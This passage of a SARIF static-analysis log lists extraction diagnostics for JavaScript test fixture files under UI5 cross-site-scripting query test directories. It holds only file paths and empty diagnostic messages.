"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 347 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 348 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 349 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 350 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 351 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 352 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 
1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 353 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 354 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 355 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", - "uriBaseId" : "%SRCROOT%", - "index" : 356 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - 
"properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 357 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 358 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 359 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 360 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - 
"text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssBase.js", - "uriBaseId" : "%SRCROOT%", - "index" : 361 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 362 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 363 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 364 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - 
"text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 365 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 366 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-indirect-control/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 367 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 368 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - 
"locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 369 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 370 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 371 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 372 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { 
- "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 373 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 374 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", - "uriBaseId" : "%SRCROOT%", - "index" : 375 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 376 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 377 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 378 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 379 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 380 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 381 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", - "uriBaseId" : "%SRCROOT%", - "index" : 382 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 383 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 384 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 385 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 386 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 387 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 388 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 389 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 390 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 391 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", - "uriBaseId" : "%SRCROOT%", - "index" : 392 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 393 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 394 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 395 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 396 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", - "uriBaseId" : "%SRCROOT%", - "index" : 397 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 398 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 399 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 400 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - 
"artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 401 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 402 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", - "uriBaseId" : "%SRCROOT%", - "index" : 403 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 404 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - 
"uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", - "uriBaseId" : "%SRCROOT%", - "index" : 405 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 406 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", - "uriBaseId" : "%SRCROOT%", - "index" : 407 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", - "uriBaseId" : "%SRCROOT%", - "index" : 408 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
